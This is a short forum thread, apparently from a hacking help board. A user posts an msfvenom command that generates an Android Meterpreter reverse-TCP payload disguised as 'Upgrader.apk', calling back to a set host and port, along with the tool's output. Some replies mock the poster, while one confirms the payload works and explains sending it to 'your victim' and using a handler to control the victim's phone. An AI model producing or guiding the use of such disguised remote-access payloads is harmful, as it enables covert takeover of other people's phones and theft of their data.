No we cant help you. Not if you don't tell us what happened and what you tried. Also, this is not your personal army of hackers.
tried this command
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.1.79 LPORT=4444 R > /root/Upgrader.apk
got this result:No platform was selected, choosing Msf::Module::Platform::Android from the payloadNo Arch selected, selecting Arch: dalvik from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 8825 bytes
That's PERFECTLY NORMAL >:|...!!! Go to your /Root/ directory and you will find your virus... -.-
Then it worked. Just go to your root directory and find it. If you don't know how... cough cough script kiddie.
No malicious intentions!!!!!!!Really???
Have you googled? Have you taken the time to at least understand the working principles of Linux. Have you tried your hand at actually writing a few scripts to see what they do and how they act?
What's the problem now?The payload is created and you can send to your victim the use handler to have access to the victim phoneBy the way there is a typo in your command:It's reverse(underline)tcp not reversetcp